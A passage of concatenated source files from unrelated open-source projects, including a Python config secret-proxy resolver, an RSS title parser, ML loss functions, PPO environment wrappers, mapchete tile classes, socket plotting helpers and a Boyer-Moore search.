value = getter()
if ttl:
expiry = time.time() + ttl
else:
expiry = None
self._cache[key] = (expiry, value)
logger.debug("Set cache for key %s", key)
return value
def get_file_content(self, filepath):
cache_key = ("FILE", filepath)
def getter():
with open(filepath, "r") as f:
return f.read()
return self._get_or_create_cached_value(cache_key, getter)
def get_secret_value(self, name):
cache_key = ("SECRET", name)
if not self._secret_client:
self._secret_client = get_secret_client()
def getter():
return self._secret_client.get(name)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
def get_bucket_file(self, key):
cache_key = ("BUCKET_FILE", key)
if not self._bucket_client:
self._bucket_client = get_bucket_client()
def getter():
return self._bucket_client.download_to_tmpfile(key)
return self._get_or_create_cached_value(cache_key, getter)
def get_parameter_value(self, key):
cache_key = ("PARAM", key)
if not self._param_client:
self._param_client = get_param_client()
def getter():
return self._param_client.get(key)
return self._get_or_create_cached_value(cache_key, getter, ttl=600)
class BaseConfig:
PROXY_VAR_RE = re.compile(
r"^\{\{\s*"
r"(?P<type>bucket_file|env|file|param|secret)\:(?P<key>[^\}\|]+)"
r"(?P<filters>(\s*\|\s*(jsondecode|base64decode|element:[a-zA-Z_\-/0-9]+))*)"
r"\s*\}\}$"
)
custom_classes = {}
def __init__(self, path=None, resolver=None):
self._path = path or ()
if not resolver:
resolver = Resolver()
self._resolver = resolver
def _make_proxy(self, key, match):
proxy_type = match.group("type")
key = match.group("key").strip()
if proxy_type == "env":
proxy = EnvProxy(key)
else:
proxy = ResolverMethodProxy(self._resolver, proxy_type, key)
filters = [f for f in [rf.strip() for rf in match.group("filters").split("|")] if f]
for filter_name in filters:
if filter_name == "jsondecode":
proxy = JSONDecodeFilter(proxy)
elif filter_name == "base64decode":
proxy = Base64DecodeFilter(proxy)
elif filter_name.startswith("element:"):
key = filter_name.split(":", 1)[-1]
proxy = ElementFilter(key, proxy)
else:
raise ValueError("Unknown filter %s", filter_name)
return proxy
def _from_python(self, key, value):
new_path = self._path + (key,)
if isinstance(value, dict):
value = self.custom_classes.get(new_path, ConfigDict)(value, new_path)
elif isinstance(value, list):
value = self.custom_classes.get(new_path, ConfigList)(value, new_path)
elif isinstance(value, str):
match = self.PROXY_VAR_RE.match(value)
if match:
value = self._make_proxy(key, match)
return value
def _to_python(self, value):
if isinstance(value, Proxy):
return value.get()
else:
return value
def __len__(self):
return len(self._collection)
def __delitem__(self, key):
del self._collection[key]
def __setitem__(self, key, value):
self._collection[key] = self._from_python(key, value)
def pop(self, key, default=None):
value = self._collection.pop(key, default)
if isinstance(value, Proxy):
value = value.get()
return value
class ConfigList(BaseConfig):
def __init__(self, config_l, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = []
for key, value in enumerate(config_l):
self._collection.append(self._from_python(str(key), value))
def __getitem__(self, key):
value = self._collection[key]
if isinstance(key, slice):
slice_repr = ":".join(str("" if i is None else i) for i in (key.start, key.stop, key.step))
logger.debug("Get /%s[%s] config key", "/".join(self._path), slice_repr)
return [self._to_python(item) for item in value]
else:
logger.debug("Get /%s[%s] config key", "/".join(self._path), key)
return self._to_python(value)
def __iter__(self):
for element in self._collection:
yield self._to_python(element)
def serialize(self):
s = []
for v in self:
if isinstance(v, BaseConfig):
v = v.serialize()
s.append(v)
return s
class ConfigDict(BaseConfig):
def __init__(self, config_d, path=None, resolver=None):
super().__init__(path=path, resolver=resolver)
self._collection = {}
for key, value in config_d.items():
self._collection[key] = self._from_python(key, value)
def __getitem__(self, key):
logger.debug("Get /%s config key", "/".join(self._path + (key,)))
value = self._collection[key]
return self._to_python(value)
def get(self, key, default=None):
try:
value = self[key]
except KeyError:
value = self._to_python(default)
return value
def __iter__(self):
yield from self._collection
def keys(self):
return self._collection.keys()
def values(self):
for value in self._collection.values():
yield self._to_python(value)
def items(self):
for key, value in self._collection.items():
yield key, self._to_python(value)
def clear(self):
return self._collection.clear()
def setdefault(self, key, default=None):
return self._collection.setdefault(key, self._from_python(key, default))
def pop(self, key, default=None):
value = self._collection.pop(key, default)
return self._to_python(value)
def popitem(self):
key, value = self._collection.popitem()
return key, self._to_python(value)
def copy(self):
return ConfigDict(self._collection.copy(), path=self._path, resolver=self._resolver)
def update(self, *args, **kwargs):
chain = []
for arg in args:
if isinstance(arg, dict):
iterator = arg.items()
else:
iterator = arg
chain = itertools.chain(chain, iterator)
if kwargs:
chain = itertools.chain(chain, kwargs.items())
        for key, value in chain:
self._collection[key] = self._from_python(key, value)
def serialize(self):
s = {}
for k, v in self.items():
if isinstance(v, BaseConfig):
v = v.serialize()
s[k] = v
return s
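# Illustrative usage sketch, not part of the original module; the variable and
# environment names below are examples only. A ConfigDict resolves "{{ ... }}"
# proxy values lazily when a key is accessed, applying the optional filters
# from left to right:
#
#     os.environ["ZENTRAL_EXAMPLE_SECRET"] = '{"api_token": "abc"}'
#     cfg = ConfigDict({
#         "plain": 1,
#         "token": "{{ env:ZENTRAL_EXAMPLE_SECRET | jsondecode | element:api_token }}",
#     })
#     cfg["plain"]  # -> 1
#     cfg["token"]  # -> "abc"  (EnvProxy -> JSONDecodeFilter -> ElementFilter)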
|
WebMirror/management/rss_parser_funcs/feed_parse_extractSecondlifetranslationsCom.py | fake-name/ReadableWebProxy | 193 | 11186982 | <reponame>fake-name/ReadableWebProxy
def extractSecondlifetranslationsCom(item):
'''
Parser for 'secondlifetranslations.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('IH', 'Immoral Holidays', 'translated'),
('ebpw', 'Everyday, Boss Is Pretending To Be Weak', 'translated'),
('everyday, boss is pretending to be weak', 'Everyday, Boss Is Pretending To Be Weak', 'translated'),
('icd', 'Indulging in Carnal Desire', 'translated'),
('pcpm', 'Please Continue Protecting Me', 'translated'),
('please continue protecting me', 'Please Continue Protecting Me', 'translated'),
('indulging in carnal desire', 'Indulging in Carnal Desire', 'translated'),
('kisses make me grow taller', 'kisses make me grow taller', 'translated'),
('wealthy supporting actress tore the script', 'Wealthy Supporting Actress Tore the Script', 'translated'),
('seduced by a married teacher', 'Seduced By a Married Teacher', 'translated'),
('hell app', 'Hell App', 'translated'),
('after being turned into a dog, i conned my way into freeloading at my rival’s place', 'After Being Turned Into a Dog, I Conned My Way Into Freeloading At My Rival’s Place', 'translated'),
('mother of a villainess', 'Mother of a Villainess', 'translated'),
('erotic fairy tales', 'Erotic Fairy Tales', 'translated'),
('dying in the male lead’s arms every time i transmigrate', 'Dying in the Male Lead’s Arms Every Time I Transmigrate', 'translated'),
('being papa’d every time i transmigrate', 'Being PAPA’d Every Time I Transmigrate', 'translated'),
('the guide to capturing a black lotus', 'the guide to capturing a black lotus', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
Chapter05/zip_processor.py | 4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition | 393 | 11186987 | import sys
import shutil
import zipfile
from pathlib import Path
from PIL import Image
class ZipProcessor:
def __init__(self, zipname):
self.zipname = zipname
self.temp_directory = Path(f"unzipped-{zipname[:-4]}")
def process_zip(self):
self.unzip_files()
self.process_files()
self.zip_files()
def unzip_files(self):
self.temp_directory.mkdir()
with zipfile.ZipFile(self.zipname) as zip:
zip.extractall(self.temp_directory)
def zip_files(self):
with zipfile.ZipFile(self.zipname, "w") as file:
for filename in self.temp_directory.iterdir():
file.write(filename, filename.name)
shutil.rmtree(self.temp_directory)
class ZipReplace(ZipProcessor):
def __init__(self, filename, search_string, replace_string):
super().__init__(filename)
self.search_string = search_string
self.replace_string = replace_string
def process_files(self):
"""perform a search and replace on all files in the
temporary directory"""
for filename in self.temp_directory.iterdir():
with filename.open() as file:
contents = file.read()
contents = contents.replace(self.search_string, self.replace_string)
with filename.open("w") as file:
file.write(contents)
class ScaleZip(ZipProcessor):
def process_files(self):
"""Scale each image in the directory to 640x480"""
for filename in self.temp_directory.iterdir():
im = Image.open(str(filename))
scaled = im.resize((640, 480))
scaled.save(filename)
if __name__ == "__main__":
# ZipReplace(*sys.argv[1:4]).process_zip()
ScaleZip(*sys.argv[1:4]).process_zip()
|
src/network/losses.py | haleqiu/TLIO | 127 | 11186989 | <gh_stars>100-1000
import torch
from network.covariance_parametrization import DiagonalParam
"""
MSE loss between prediction and target, no covariance
input:
pred: Nx3 vector of network displacement output
targ: Nx3 vector of gt displacement
output:
loss: Nx3 vector of MSE loss on x,y,z
"""
def loss_mse(pred, targ):
loss = (pred - targ).pow(2)
return loss
"""
Log Likelihood loss, with covariance (only support diag cov)
input:
pred: Nx3 vector of network displacement output
targ: Nx3 vector of gt displacement
pred_cov: Nx3 vector of log(sigma) on the diagonal entries
output:
loss: Nx3 vector of likelihood loss on x,y,z
resulting pred_cov meaning:
pred_cov:(Nx3) u = [log(sigma_x) log(sigma_y) log(sigma_z)]
"""
def loss_distribution_diag(pred, pred_cov, targ):
loss = ((pred - targ).pow(2)) / (2 * torch.exp(2 * pred_cov)) + pred_cov
return loss
"""
Log Likelihood loss, with covariance (support full cov)
(NOTE: output is Nx1)
input:
pred: Nx3 vector of network displacement output
targ: Nx3 vector of gt displacement
pred_cov: Nxk covariance parametrization
output:
loss: Nx1 vector of likelihood loss
resulting pred_cov meaning:
DiagonalParam:
pred_cov:(Nx3) u = [log(sigma_x) log(sigma_y) log(sigma_z)]
PearsonParam:
pred_cov (Nx6): u = [log(sigma_x) log(sigma_y) log(sigma_z)
rho_xy, rho_xz, rho_yz] (Pearson correlation coeff)
"""
def criterion_distribution(pred, pred_cov, targ):
loss = DiagonalParam.toMahalanobisDistance(
targ, pred, pred_cov, clamp_covariance=False
    )
    return loss
"""
Select loss function based on epochs
all variables on gpu
output:
loss: Nx3
"""
def get_loss(pred, pred_cov, targ, epoch):
if epoch < 10:
loss = loss_mse(pred, targ)
# elif epoch < 50:
# loss = 0.5 * loss_mse(pred, targ) + 0.5 * loss_distribution_diag(
# pred, pred_cov, targ
# )
else:
loss = loss_distribution_diag(pred, pred_cov, targ)
return loss
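# Illustrative shape check, not part of the original module: the losses above
# act elementwise on (N, 3) tensors, so the returned loss is also (N, 3).
#
#     pred = torch.zeros(8, 3)
#     targ = torch.ones(8, 3)
#     pred_cov = torch.zeros(8, 3)             # log(sigma) = 0, i.e. sigma = 1
#     loss_mse(pred, targ).shape                          # torch.Size([8, 3])
#     loss_distribution_diag(pred, pred_cov, targ).shape  # torch.Size([8, 3])
#     get_loss(pred, pred_cov, targ, epoch=0)    # MSE warm-up phase
#     get_loss(pred, pred_cov, targ, epoch=50)   # likelihood loss with covariance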
|
run_BOA.py | cyy111/metaheuristics | 104 | 11186994 | from models.multiple_solution.swarm_based.BOA import BaseBOA, OriginalBOA, AdaptiveBOA
from utils.FunctionUtil import *
## Setting parameters
root_paras = {
"problem_size": 100,
"domain_range": [-100, 100],
"print_train": True,
"objective_func": C30
}
boa_paras = {
"epoch": 500,
"pop_size": 100,
"c": 0.01,
"p": 0.8,
"alpha": [0.1, 0.3]
}
## Run model
md = AdaptiveBOA(root_algo_paras=root_paras, boa_paras=boa_paras)
md._train__()
|
algorithms/PPO/env_wrapper.py | borgwang/reinforce_py | 119 | 11186997 | <gh_stars>100-1000
import time
import csv
import json
import gym
from gym.core import Wrapper
import os.path as osp
import numpy as np
from utils import RunningMeanStd
class BaseVecEnv(object):
"""
Vectorized environment base class
"""
def step(self, vac):
"""
Apply sequence of actions to sequence of environments
actions -> (observations, rewards, dones)
"""
raise NotImplementedError
def reset(self):
"""
Reset all environments
"""
raise NotImplementedError
def close(self):
pass
def set_random_seed(self, seed):
raise NotImplementedError
class VecEnv(BaseVecEnv):
def __init__(self, env_fns):
self.envs = [fn() for fn in env_fns]
env = self.envs[0]
self.action_space = env.action_space
self.observation_space = env.observation_space
self.ts = np.zeros(len(self.envs), dtype='int')
def step(self, action_n):
results = [env.step(a) for (a, env) in zip(action_n, self.envs)]
obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if done:
obs[i] = self.envs[i].reset()
self.ts[i] = 0
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def render(self):
self.envs[0].render()
@property
def num_envs(self):
return len(self.envs)
class VecEnvNorm(BaseVecEnv):
def __init__(self, venv, ob=True, ret=True,
clipob=10., cliprew=10., gamma=0.99, epsilon=1e-8):
self.venv = venv
self._ob_space = venv.observation_space
self._ac_space = venv.action_space
self.ob_rms = RunningMeanStd(shape=self._ob_space.shape) if ob else None
self.ret_rms = RunningMeanStd(shape=()) if ret else None
self.clipob = clipob
self.cliprew = cliprew
self.ret = np.zeros(self.num_envs)
self.gamma = gamma
self.epsilon = epsilon
def step(self, vac):
obs, rews, news, infos = self.venv.step(vac)
self.ret = self.ret * self.gamma + rews
# normalize observations
obs = self._norm_ob(obs)
# normalize rewards
if self.ret_rms:
self.ret_rms.update(self.ret)
rews = np.clip(rews / np.sqrt(self.ret_rms.var + self.epsilon),
-self.cliprew, self.cliprew)
return obs, rews, news, infos
def _norm_ob(self, obs):
if self.ob_rms:
self.ob_rms.update(obs)
obs = np.clip(
(obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon),
-self.clipob, self.clipob)
return obs
else:
return obs
def reset(self):
obs = self.venv.reset()
return self._norm_ob(obs)
def set_random_seed(self, seeds):
for env, seed in zip(self.venv.envs, seeds):
env.seed(int(seed))
@property
def action_space(self):
return self._ac_space
@property
def observation_space(self):
return self._ob_space
def close(self):
self.venv.close()
def render(self):
self.venv.render()
@property
def num_envs(self):
return self.venv.num_envs
class Monitor(Wrapper):
EXT = "monitor.csv"
f = None
def __init__(self, env, filename, allow_early_resets=False, reset_keywords=()):
Wrapper.__init__(self, env=env)
self.tstart = time.time()
if filename is None:
self.f = None
self.logger = None
else:
if not filename.endswith(Monitor.EXT):
if osp.isdir(filename):
filename = osp.join(filename, Monitor.EXT)
else:
filename = filename + "." + Monitor.EXT
self.f = open(filename, "wt")
self.f.write('#%s\n'%json.dumps({"t_start": self.tstart, "gym_version": gym.__version__,
"env_id": env.spec.id if env.spec else 'Unknown'}))
self.logger = csv.DictWriter(self.f, fieldnames=('r', 'l', 't')+reset_keywords)
self.logger.writeheader()
self.reset_keywords = reset_keywords
self.allow_early_resets = allow_early_resets
self.rewards = None
self.needs_reset = True
self.episode_rewards = []
self.episode_lengths = []
self.total_steps = 0
self.current_reset_info = {} # extra info about the current episode, that was passed in during reset()
def _reset(self, **kwargs):
if not self.allow_early_resets and not self.needs_reset:
raise RuntimeError("Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)")
self.rewards = []
self.needs_reset = False
for k in self.reset_keywords:
v = kwargs.get(k)
if v is None:
raise ValueError('Expected you to pass kwarg %s into reset'%k)
self.current_reset_info[k] = v
return self.env.reset(**kwargs)
def _step(self, action):
if self.needs_reset:
raise RuntimeError("Tried to step environment that needs reset")
ob, rew, done, info = self.env.step(action)
self.rewards.append(rew)
if done:
self.needs_reset = True
eprew = sum(self.rewards)
eplen = len(self.rewards)
epinfo = {"r": round(eprew, 6), "l": eplen, "t": round(time.time() - self.tstart, 6)}
epinfo.update(self.current_reset_info)
if self.logger:
self.logger.writerow(epinfo)
self.f.flush()
self.episode_rewards.append(eprew)
self.episode_lengths.append(eplen)
info['episode'] = epinfo
self.total_steps += 1
return (ob, rew, done, info)
def close(self):
if self.f is not None:
self.f.close()
def get_total_steps(self):
return self.total_steps
def get_episode_rewards(self):
return self.episode_rewards
def get_episode_lengths(self):
return self.episode_lengths
def make_env():
def env_fn():
env = gym.make(args.env)
env = Monitor(env, logger.get_dir())
return env
env = VecEnv([env_fn] * args.n_envs)
env = VecEnvNorm(env)
return env
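# Illustrative usage sketch, not part of the original module; the environment
# id below is only an example. Wrap several copies of a gym environment and
# normalize observations and returns:
#
#     env_fns = [lambda: gym.make("CartPole-v0")] * 4
#     env = VecEnvNorm(VecEnv(env_fns))
#     obs = env.reset()                       # stacked, normalized observations
#     actions = [env.action_space.sample() for _ in range(env.num_envs)]
#     obs, rews, dones, infos = env.step(actions)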
|
Python/String/ParseStringUpperRemoveSpace.py | piovezan/SOpt | 148 | 11187009 | frase = input("Escreva uma frase: ")
fraseNova = ""
for chr in frase:
if chr != " ":
fraseNova += chr.upper()
print(fraseNova)
#https://pt.stackoverflow.com/q/340130/101
|
mapchete/tile.py | Scartography/mapchete | 161 | 11187047 | <filename>mapchete/tile.py
"""Mapchtete handling tiles."""
from cached_property import cached_property
from itertools import product
from shapely.geometry import box
from tilematrix import Tile, TilePyramid
class BufferedTilePyramid(TilePyramid):
"""
A special tile pyramid with fixed pixelbuffer and metatiling.
Parameters
----------
pyramid_type : string
pyramid projection type (``geodetic`` or ``mercator``)
metatiling : integer
metatile size (default: 1)
pixelbuffer : integer
buffer around tiles in pixel (default: 0)
Attributes
----------
tile_pyramid : ``TilePyramid``
underlying ``TilePyramid``
metatiling : integer
metatile size
pixelbuffer : integer
tile buffer size in pixels
"""
def __init__(self, grid=None, metatiling=1, tile_size=256, pixelbuffer=0):
"""Initialize."""
TilePyramid.__init__(self, grid, metatiling=metatiling, tile_size=tile_size)
self.tile_pyramid = TilePyramid(
grid, metatiling=metatiling, tile_size=tile_size
)
self.metatiling = metatiling
if isinstance(pixelbuffer, int) and pixelbuffer >= 0:
self.pixelbuffer = pixelbuffer
else:
raise ValueError("pixelbuffer has to be a non-negative int")
def tile(self, zoom, row, col):
"""
Return ``BufferedTile`` object of this ``BufferedTilePyramid``.
Parameters
----------
zoom : integer
zoom level
row : integer
tile matrix row
col : integer
tile matrix column
Returns
-------
buffered tile : ``BufferedTile``
"""
tile = self.tile_pyramid.tile(zoom, row, col)
return BufferedTile(tile, pixelbuffer=self.pixelbuffer)
def tiles_from_bounds(self, bounds, zoom):
"""
Return all tiles intersecting with bounds.
Bounds values will be cleaned if they cross the antimeridian or are
outside of the Northern or Southern tile pyramid bounds.
Parameters
----------
bounds : tuple
(left, bottom, right, top) bounding values in tile pyramid CRS
zoom : integer
zoom level
Yields
------
intersecting tiles : generator
generates ``BufferedTiles``
"""
for tile in self.tiles_from_bbox(box(*bounds), zoom):
yield self.tile(*tile.id)
def tiles_from_bbox(self, geometry, zoom):
"""
All metatiles intersecting with given bounding box.
Parameters
----------
geometry : ``shapely.geometry``
zoom : integer
zoom level
Yields
------
intersecting tiles : generator
generates ``BufferedTiles``
"""
for tile in self.tile_pyramid.tiles_from_bbox(geometry, zoom):
yield self.tile(*tile.id)
def tiles_from_geom(self, geometry, zoom):
"""
Return all tiles intersecting with input geometry.
Parameters
----------
geometry : ``shapely.geometry``
zoom : integer
zoom level
Yields
------
intersecting tiles : ``BufferedTile``
"""
for tile in self.tile_pyramid.tiles_from_geom(geometry, zoom):
yield self.tile(*tile.id)
def intersecting(self, tile):
"""
Return all BufferedTiles intersecting with tile.
Parameters
----------
tile : ``BufferedTile``
another tile
"""
return [
self.tile(*intersecting_tile.id)
for intersecting_tile in self.tile_pyramid.intersecting(tile)
]
def to_dict(self):
"""
Return dictionary representation of pyramid parameters.
"""
return dict(
grid=self.grid.to_dict(),
metatiling=self.metatiling,
tile_size=self.tile_size,
pixelbuffer=self.pixelbuffer,
)
def from_dict(config_dict):
"""
Initialize TilePyramid from configuration dictionary.
"""
return BufferedTilePyramid(**config_dict)
def __repr__(self):
return (
"BufferedTilePyramid(%s, tile_size=%s, metatiling=%s, pixelbuffer=%s)"
% (self.grid, self.tile_size, self.metatiling, self.pixelbuffer)
)
class BufferedTile(Tile):
"""
A special tile with fixed pixelbuffer.
Parameters
----------
tile : ``Tile``
pixelbuffer : integer
tile buffer in pixels
Attributes
----------
height : integer
tile height in pixels
width : integer
tile width in pixels
shape : tuple
tile width and height in pixels
affine : ``Affine``
``Affine`` object describing tile extent and pixel size
bounds : tuple
left, bottom, right, top values of tile boundaries
bbox : ``shapely.geometry``
tile bounding box as shapely geometry
pixelbuffer : integer
pixelbuffer used to create tile
profile : dictionary
rasterio metadata profile
"""
def __init__(self, tile, pixelbuffer=0):
"""Initialize."""
if isinstance(tile, BufferedTile):
tile = TilePyramid(
tile.tp.grid, tile_size=tile.tp.tile_size, metatiling=tile.tp.metatiling
).tile(*tile.id)
Tile.__init__(self, tile.tile_pyramid, tile.zoom, tile.row, tile.col)
self._tile = tile
self.pixelbuffer = pixelbuffer
@cached_property
def left(self):
return self.bounds.left
@cached_property
def bottom(self):
return self.bounds.bottom
@cached_property
def right(self):
return self.bounds.right
@cached_property
def top(self):
return self.bounds.top
@cached_property
def height(self):
"""Return buffered height."""
return self._tile.shape(pixelbuffer=self.pixelbuffer).height
@cached_property
def width(self):
"""Return buffered width."""
return self._tile.shape(pixelbuffer=self.pixelbuffer).width
@cached_property
def shape(self):
"""Return buffered shape."""
return self._tile.shape(pixelbuffer=self.pixelbuffer)
@cached_property
def affine(self):
"""Return buffered Affine."""
return self._tile.affine(pixelbuffer=self.pixelbuffer)
@cached_property
def bounds(self):
"""Return buffered bounds."""
return self._tile.bounds(pixelbuffer=self.pixelbuffer)
@cached_property
def bbox(self):
"""Return buffered bounding box."""
return self._tile.bbox(pixelbuffer=self.pixelbuffer)
def get_children(self):
"""
Get tile children (intersecting tiles in next zoom level).
Returns
-------
children : list
a list of ``BufferedTiles``
"""
return [BufferedTile(t, self.pixelbuffer) for t in self._tile.get_children()]
def get_parent(self):
"""
Get tile parent (intersecting tile in previous zoom level).
Returns
-------
parent : ``BufferedTile``
"""
return BufferedTile(self._tile.get_parent(), self.pixelbuffer)
def get_neighbors(self, connectedness=8):
"""
Return tile neighbors.
        Tile neighbors are unique, i.e. in some edge cases the left and right
        neighbors wrapped around the antimeridian are the same. Also,
        neighbors outside the northern and southern TilePyramid boundaries are
        excluded, because they are invalid.
# -------------
# | 8 | 1 | 5 |
# -------------
# | 4 | x | 2 |
# -------------
# | 7 | 3 | 6 |
# -------------
Parameters
----------
connectedness : int
[4 or 8] return four direct neighbors or all eight.
Returns
-------
list of BufferedTiles
"""
return [
BufferedTile(t, self.pixelbuffer)
for t in self._tile.get_neighbors(connectedness=connectedness)
]
def is_on_edge(self):
"""Determine whether tile touches or goes over pyramid edge."""
return (
            self.left <= self.tile_pyramid.left  # touches_left
            or self.bottom <= self.tile_pyramid.bottom  # touches_bottom
            or self.right >= self.tile_pyramid.right  # touches_right
            or self.top >= self.tile_pyramid.top  # touches_top
)
def __eq__(self, other):
return (
isinstance(other, self.__class__)
and self.pixelbuffer == other.pixelbuffer
and self.tp == other.tp
and self.id == other.id
)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "BufferedTile(%s, tile_pyramid=%s, pixelbuffer=%s)" % (
self.id,
self.tp,
self.pixelbuffer,
)
def __hash__(self):
return hash(repr(self))
def count_tiles(geometry, pyramid, minzoom, maxzoom, init_zoom=0):
"""
Count number of tiles intersecting with geometry.
Parameters
----------
geometry : shapely geometry
pyramid : TilePyramid
minzoom : int
maxzoom : int
init_zoom : int
Returns
-------
number of tiles
"""
if not 0 <= init_zoom <= minzoom <= maxzoom: # pragma: no cover
raise ValueError("invalid zoom levels given")
# tile buffers are not being taken into account
unbuffered_pyramid = TilePyramid(
pyramid.grid, tile_size=pyramid.tile_size, metatiling=pyramid.metatiling
)
# make sure no rounding errors occur
geometry = geometry.buffer(-0.000000001)
return _count_tiles(
[
unbuffered_pyramid.tile(*tile_id)
for tile_id in product(
[init_zoom],
range(pyramid.matrix_height(init_zoom)),
range(pyramid.matrix_width(init_zoom)),
)
],
geometry,
minzoom,
maxzoom,
)
def _count_tiles(tiles, geometry, minzoom, maxzoom):
count = 0
for tile in tiles:
# determine data covered by tile
tile_intersection = tile.bbox().intersection(geometry)
# skip if there is no data
if tile_intersection.is_empty:
continue
# increase counter as tile contains data
elif tile.zoom >= minzoom:
count += 1
# if there are further zoom levels, analyze descendants
if tile.zoom < maxzoom:
# if tile is half full, analyze each descendant
# also do this if the tile children are not four in which case we cannot use
# the count formula below
if (
tile_intersection.area < tile.bbox().area
or len(tile.get_children()) != 4
):
count += _count_tiles(
tile.get_children(), tile_intersection, minzoom, maxzoom
)
# if tile is full, all of its descendants will be full as well
else:
# sum up tiles for each remaining zoom level
count += sum(
[
4 ** z
for z in range(
# only count zoom levels which are greater than minzoom or
# count all zoom levels from tile zoom level to maxzoom
minzoom - tile.zoom if tile.zoom < minzoom else 1,
maxzoom - tile.zoom + 1,
)
]
)
return count
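# Illustrative usage sketch, not part of the original module; the grid name and
# tile coordinates below are examples only:
#
#     tp = BufferedTilePyramid("geodetic", metatiling=2, pixelbuffer=16)
#     tile = tp.tile(5, 3, 7)
#     tile.bounds   # buffered bounds in the pyramid CRS
#     tile.shape    # buffered (height, width) in pixels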
|
codigo_das_aulas/aula_17/exemplo_10.py | VeirichR/curso-python-selenium | 234 | 11187069 | from selene.support.shared import browser
from selene.support.conditions import be
from selene.support.conditions import have
browser.open(
'http://selenium.dunossauro.live/aula_07'
)
label = browser.element(
'[for="nome"]'
)
label.should(have.text('nome'))
browser.all(
'input'
).should(have.size(4)).first.type('Duduzin')
label.should(have.text('Não vale mentir o nome'))
|
artemis/remote/plotting/utils.py | peteroconnor-bc/artemis | 235 | 11187118 | <reponame>peteroconnor-bc/artemis
from six.moves import queue
import threading
import time
from collections import namedtuple
from artemis.remote.utils import recv_size, send_size
def _queue_get_all_no_wait(q, max_items_to_retreive):
"""
    Empties the queue, but takes at most max_items_to_retreive items from the queue
:param q:
:param max_items_to_retreive:
:return:
"""
items = []
for numOfItemsRetrieved in range(0, max_items_to_retreive):
try:
items.append(q.get_nowait())
except queue.Empty:
break
return items
def handle_socket_accepts(sock, main_input_queue=None, return_queue=None, max_number=0):
"""
    This accepts max_number of incoming communication requests to sock and starts the threads that manage the data transfer between the server and the clients
:param sock:
:param main_input_queue:
:param return_queue:
:param max_number:
:return:
"""
return_lock = threading.Lock()
for _ in range(max_number):
connection, client_address = sock.accept()
if main_input_queue:
t0 = threading.Thread(target=handle_input_connection,args=(connection, client_address, main_input_queue))
t0.setDaemon(True)
t0.start()
if return_queue:
t1 = threading.Thread(target=handle_return_connection,args=(connection, client_address, return_queue, return_lock))
t1.setDaemon(True)
t1.start()
def handle_return_connection(connection, client_address, return_queue, return_lock):
"""
    For each client, there is a thread that continuously checks for the confirmation that a plot from this client has been rendered.
    This thread takes hold of the return queue, dequeues at most 10 objects and checks if there is a return message for the client that is governed by this thread.
    All other return messages are put back into the queue. Then the lock on the queue is released so that other threads might serve their clients their respective messages.
    The return messages belonging to this client are then sent back.
:param connection:
:param client_address:
:param return_queue:
:param return_lock:
:return:
"""
while True:
return_lock.acquire()
if not return_queue: break
try:
return_objects = _queue_get_all_no_wait(return_queue, 10)
except Exception:
break
if len(return_objects) > 0:
owned_items = []
for client, plot_id in return_objects:
if client == client_address:
owned_items.append(plot_id)
else:
return_queue.put((client,plot_id))
return_lock.release()
for plot_id in owned_items:
message = plot_id
send_size(sock=connection, data=message)
else:
return_lock.release()
time.sleep(0.01)
ClientMessage = namedtuple('ClientMessage', ['dbplot_message', 'client_address'])
# dbplot_args is a DBPlotMessage object
# client_address: A string IP address
def handle_input_connection(connection, client_address, input_queue):
"""
For each client, there is a thread that waits for incoming plots over the network. If a plot came in, this plot is then put into the main queue from which the server takes
plots away.
:param connection:
:param client_address:
:param input_queue:
:return:
"""
while True:
recv_message = recv_size(connection)
if not input_queue: break
input_queue.put(ClientMessage(recv_message, client_address))
connection.close()
|
bandits/__init__.py | jadkins99/bandits | 686 | 11187135 | <reponame>jadkins99/bandits
from .agent import Agent, GradientAgent, BetaAgent
from .bandit import GaussianBandit, BinomialBandit, BernoulliBandit
from .environment import Environment
from .policy import (EpsilonGreedyPolicy, GreedyPolicy, RandomPolicy, UCBPolicy,
SoftmaxPolicy)
|
day12/Python/boyerMoore.py | Grace0Hud/dailycodebase | 249 | 11187140 | '''
@author prateek3255
@date 05/01/2018
'''
def boyerMoore(string, pattern):
    # Boyer-Moore search using only the bad-character heuristic.
    # Returns the index of the first occurrence of pattern in string, or -1.
    n = len(string)
    m = len(pattern)
    i = 0
    while i <= n - m:
        k = m - 1
        j = m + i - 1
        # compare the pattern right-to-left against string[i:i+m]
        while string[j] == pattern[k]:
            if k == 0:
                # every character, including pattern[0], matched
                return i
            k = k - 1
            j = j - 1
        # bad-character shift: align string[j] with its rightmost occurrence
        # in the pattern (if any), always advancing by at least one position
        if pattern.rfind(string[j]) == -1:
            i = j + 1
        else:
            i = max(i + 1, j - pattern.rfind(string[j]))
    return -1
print(boyerMoore("helloworld","hello"))
print(boyerMoore("helloworld","hop"))
print(boyerMoore("abcrxyzgf","xyz"))
print(boyerMoore("ABABDABACDABABCABAB","ABABCABAB"))
|
rex/enums.py | shellphish/rex | 471 | 11187188 | <gh_stars>100-1000
class CrashInputType:
STDIN = "stdin"
POV_FILE = "pov_file"
TCP = "tcp"
UDP = "udp"
TCP6 = "tcp6"
UDP6 = "udp6"
|
Datasets/Terrain/alos_topo_diversity.py | monocilindro/qgis-earthengine-examples | 646 | 11187208 | import ee
from ee_plugin import Map
dataset = ee.Image('CSP/ERGo/1_0/Global/ALOS_topoDiversity')
alosTopographicDiversity = dataset.select('constant')
alosTopographicDiversityVis = {
'min': 0.0,
'max': 1.0,
}
Map.setCenter(-111.313, 39.724, 6)
Map.addLayer(
alosTopographicDiversity, alosTopographicDiversityVis,
'ALOS Topographic Diversity')
|
climin/initialize.py | farhansabir123/climin | 140 | 11187250 | <reponame>farhansabir123/climin
# -*- coding: utf-8 -*-
